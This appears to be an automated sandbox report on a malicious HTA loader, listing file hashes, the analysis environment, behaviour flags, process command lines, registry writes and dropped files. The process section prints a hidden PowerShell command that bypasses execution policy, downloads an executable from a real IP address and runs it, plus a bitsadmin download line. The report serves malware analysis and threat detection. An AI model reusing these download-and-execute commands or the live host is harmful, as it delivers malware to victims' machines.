General Info

File name

jnn.hta

Full analysis
https://app.any.run/tasks/eb48ca2b-468e-4722-9e40-5b04796f96ff
Verdict
Malicious activity
Analysis date
3/14/2019, 12:27:22
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

loader

opendir

autoit

Indicators:

MIME:
text/html
File info:
HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
MD5

a6d6cdc59c6507424b2aedeff46afd2b

SHA1

3d9d1169a822d2c17ba8e8f1e42794246aea8958

SHA256

bd6b52e1365e898cf42a2ae281e897884c440bd33140a264f90e34d4aae3330a

SSDEEP

48:ZKpON1CTY1zH1aKL2slzhapoeddogoioFxBZoWk0uynk3nKpON1CTY1zH1aKL2s2:ZBvaY1zUMdzBZweoBvaY1zUMdzBZwjP

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
60 seconds
Additional time used
none
Fakenet option
off
Heavy Evaision option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (68.0.3440.106)
  • Google Update Helper (1.3.33.17)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
  • Mozilla Firefox 61.0.2 (x86 en-US) (61.0.2)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

MALICIOUS SUSPICIOUS INFO
Downloads executable files from the Internet
  • powershell.exe (PID: 3036)
Uses BITADMIN.EXE for downloading application
  • mshta.exe (PID: 3484)
Application was dropped or rewritten from another process
  • mdo.exe (PID: 2740)
  • Hmmmm.exe (PID: 3144)
Executes PowerShell scripts
  • mshta.exe (PID: 3484)
Downloads executable files from IP
  • powershell.exe (PID: 3036)
Executable content was dropped or overwritten
  • Hmmmm.exe (PID: 3144)
  • powershell.exe (PID: 3036)
Creates files in the user directory
  • powershell.exe (PID: 3036)
Drop AutoIt3 executable file
  • Hmmmm.exe (PID: 3144)
Dropped object may contain Bitcoin addresses
  • Hmmmm.exe (PID: 3144)
  • mdo.exe (PID: 2740)
Reads internet explorer settings
  • mshta.exe (PID: 3484)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

TRiD
.txt
|   Text - UTF-8 encoded (100%)
EXIF
HTML
ContentType:
text/html; charset=utf-8

Screenshots

Processes

Total processes
36
Monitored processes
5
Malicious processes
1
Suspicious processes
1

Behavior graph

+
start download and start drop and start mshta.exe no specs bitsadmin.exe no specs powershell.exe hmmmm.exe mdo.exe no specs
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
3484
CMD
"C:\Windows\System32\mshta.exe" "C:\Users\admin\AppData\Local\Temp\jnn.hta"
Path
C:\Windows\System32\mshta.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Microsoft (R) HTML Application host
Version
8.00.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\mshta.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\mshtml.dll
c:\windows\system32\psapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\msls31.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\clbcatq.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\shell32.dll
c:\windows\system32\msimtf.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\sxs.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\vbscript.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\scrrun.dll
c:\windows\system32\propsys.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\profapi.dll
c:\windows\system32\bitsadmin.exe
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\jscript.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\inetcpl.cpl

PID
2604
CMD
"C:\Windows\System32\bitsadmin.exe" /transfer myFile /download /priority normal Your Binded File Direct URL C:\Users\admin\AppData\Local\Temp\text.rtf
Path
C:\Windows\System32\bitsadmin.exe
Indicators
No indicators
Parent process
mshta.exe
User
admin
Integrity Level
MEDIUM
Exit code
2147942487
Version:
Company
Microsoft Corporation
Description
BITS administration utility
Version
7.5.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\bitsadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\qmgrprxy.dll

PID
3036
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://141.136.44.78/jnn/jnn.exe','C:\Users\admin\AppData\Local\Temp\Hmmmm.exe');Start-Process C:\Users\admin\AppData\Local\Temp\Hmmmm.exe;
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
mshta.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\nsi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\users\admin\appdata\local\temp\hmmmm.exe
c:\windows\system32\netutils.dll

PID
3144
CMD
"C:\Users\admin\AppData\Local\Temp\Hmmmm.exe"
Path
C:\Users\admin\AppData\Local\Temp\Hmmmm.exe
Indicators
Parent process
powershell.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\temp\hmmmm.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\aclayers.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\mpr.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\riched32.dll
c:\windows\system32\riched20.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\clbcatq.dll
c:\program files\common files\microsoft shared\ink\tiptsf.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\users\admin\appdata\local\temp\88127361\mdo.exe
c:\windows\system32\sfc.dll
c:\windows\system32\sfc_os.dll
c:\windows\system32\devrtl.dll

PID
2740
CMD
"C:\Users\admin\AppData\Local\Temp\88127361\mdo.exe" seg=muu
Path
C:\Users\admin\AppData\Local\Temp\88127361\mdo.exe
Indicators
No indicators
Parent process
Hmmmm.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
AutoIt Team
Description
AutoIt v3 Script
Version
3, 3, 14, 5
Modules
Image
c:\users\admin\appdata\local\temp\88127361\mdo.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\wsock32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\nsi.dll
c:\windows\system32\version.dll
c:\windows\system32\winmm.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\mpr.dll
c:\windows\system32\wininet.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\psapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\aclayers.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\winspool.drv
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll

Registry activity

Total events
1026
Read events
947
Write events
79
Delete events
0

Modification events

PID
Process
Operation
Key
Name
Value
3484
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3484
mshta.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3036
powershell.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
LanguageList
en-US
3036
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
0
3036
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
0
3036
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
4294901760
3036
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
4294901760
3036
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
1048576
3036
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
%windir%\tracing
3036
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
0
3036
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
0
3036
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
4294901760
3036
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
4294901760
3036
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
1048576
3036
powershell.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
%windir%\tracing
3036
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3036
powershell.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3144
Hmmmm.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3144
Hmmmm.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1

Files activity

Executable files
2
Suspicious files
2
Text files
54
Unknown types
0

Dropped files

PID
Process
Filename
Type
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\mdo.exe
executable
MD5: c56b5f0201a3b3de53e561fe76912bfd
SHA256: 237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d
3036
powershell.exe
C:\Users\admin\AppData\Local\Temp\Hmmmm.exe
executable
MD5: 22cf84a2fd381a3e383e65c933553fe1
SHA256: f62a182a1b4bd3f05ad0a639b3c5333990a6721dae6715ca6863e5e97d03a6e8
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\jkm.mp3
text
MD5: d764faade38682911bebbe4386b1ced4
SHA256: 27fa4da115127f99de35b1b6d2d241fd2e420ef7b14539bdaba45e33e5e0fdc4
2740
mdo.exe
C:\Users\admin\AppData\Local\Temp\88127361\YXUMT
text
MD5: 4d184c13b95c0c8d7cf644b9599bfed4
SHA256: 11ab9c4ce531bf94d9ffb7d242a41fae41ccb95e5fc9845c37d315e345b1e2ee
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\swq.xl
text
MD5: bc716dec0a405bd457fdb8aae6f880d4
SHA256: 521008524e25091b703c03e9c2b77388e24f0a1d89bf9c92d6ae453f8409c5b6
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\otp.ico
text
MD5: b84743ee3bd9c88c1bf27279e3e1e8cc
SHA256: ca56196b6f06c185cf87311e6e49eb71393a2d3967fb6ce1213a50f122295491
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\agf.mp3
text
MD5: 6b683766e31bf4c09e9606b132a0dcbb
SHA256: e73aef70c5db9d851d906b775e5aabe18888062af3faf53c0ec8cbca5b55e535
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\crc.bmp
text
MD5: c68768cbca85c691387a6dd545162283
SHA256: a2426d1643153e335aab55a4c8078e5dc42416142d9890ce9256e38b3ed63106
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\lph.xl
text
MD5: 602face6e7db59f16cdcf5c62a90fdf4
SHA256: bf42e5064bb8056a92711535f5c332500f7eb8351a6a7b076992e8d416445b83
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\ema.mp4
text
MD5: 19e2227a516dd3c03af3f429ad3cb801
SHA256: 6d7024ebd9a1ed69679795de3fd9cd93d8dc6cb00826822eed818b950ac1a403
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\vur.mp4
text
MD5: 20458011d0d339b9d638cd696b112533
SHA256: 771530df8d287e3b3f6c1ef14cfc8d2104cd158a7cf73c3cf12b6ac18565d515
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\nkd.docx
text
MD5: 2a1f8daf674e9855126c8a9fe1f52f08
SHA256: a5ead5b669f54af308cd26009949e93dddf82721ecee453e7430639bb357f2e9
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\dnq.mp3
text
MD5: 1770257b1d796e2c229417b1dd44171e
SHA256: 7dc9ca12a862d2f7ec48117148bdb82c53e001db155628de552bb84c033ec40e
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\iwc.txt
text
MD5: c7329353c0cdcdfbfbc625a5121fa4c0
SHA256: 0f6005a715a87630f15de43e21f0e88c1da01b0f7a95b4a9be92fb8c5acc94d8
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\wlx.mp3
text
MD5: 3ef0a39f10a6a648a1776e7a5fd356d1
SHA256: 3c5db10a768ddb3694a65cdd7f662411759a1f1b3f6d33b30030ef2e1826cb29
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\iwd.docx
text
MD5: 52b5dd8a14c0e8b0c1348f1445c9605f
SHA256: 6dc83bc1f8f7e95296c7b70b68caa85056513f9e079137a843ef0fece00cd294
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\uvh.dat
text
MD5: f7d948d24ab00d59fda153ff1c40dad7
SHA256: 4f127ae7c1d45a796718fe442bf3eea86c3ed464a744fe20d2bcd244a843ee80
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\bqc.pdf
text
MD5: dcc558713f18bb6f9f1986614670d633
SHA256: bd17ebfdfbbe72298118e4878256d0c306134dae72e24165ac9a9b96c5d7add3
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\ras.mp3
text
MD5: f6002c65bf5773dbb147aa34813138f3
SHA256: f5fbdc98a578ca4fa9c0c0b9838ebc188ee55efcd5812b2adec14c8bea1281b1
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\ucu.icm
text
MD5: d9b3eb6f6cbab2b8565265147411a2dd
SHA256: 16d9831ec31cc0696835b56cc4d7ff59cdd7f9380b0c12bc09fd8752d4b81223
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\bkr.dat
text
MD5: 220534e4734ceeaae6bb055b4f0ce3cf
SHA256: 715de9c63dc88fd8f8e8540f067685ed620eff0178e16ae45853c454146287da
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\hrp.jpg
text
MD5: 520be58348f83651a6a77d7180c18f1e
SHA256: 81061cb012d827dc6805d6f38e46069478d5ef4062809609ecc64abf8d410a73
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\hlk.mp3
text
MD5: 6b00ad93325c0a65afbb84f495edd1a8
SHA256: b079e22683fcd46b416a695a4550b6e06db15bba197179d6120904f90ddadb88
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\jrx.docx
text
MD5: 5744c7f84cdad1fb1027e90e02e33530
SHA256: da8e37eb2f0c1ba7d298a184c8e263ff81d84f5ff5cb4e52541edff939a7ccbe
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\gbd.ppt
text
MD5: 8ca027526de874041007ebbf4749597b
SHA256: d8e049827a9f7eb38557f48c134bf30893bb798af61878c5a2d9b512fb69022c
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\bos.dat
text
MD5: af76971543c4ce9db8caf2e571875f4f
SHA256: fdb64db0910f2ec413da1e4c18c505c2cce72231b1e5ef007605f78a6e5dd1d6
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\kgo.bmp
text
MD5: 4ef0cd3566b0cd7df92dd53b2615190b
SHA256: 86aa28bd8be550be1a2632f5ef119b78bf05efb98cf2316e777be81597c13c04
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\qaa.xl
text
MD5: f4712ebb85e9532888e8479a3d71448e
SHA256: 7ceea16b3c8eb2a38ed9e2bbb3462232f84c15dc66d4ab594ca1ff7c4d78954c
3144
Hmmmm.exe
C:\Users\admin\AppData\Local\Temp\88127361\tlr.txt
text
MD5: 19edfee859fce71ce355d9d7d9f2fae3
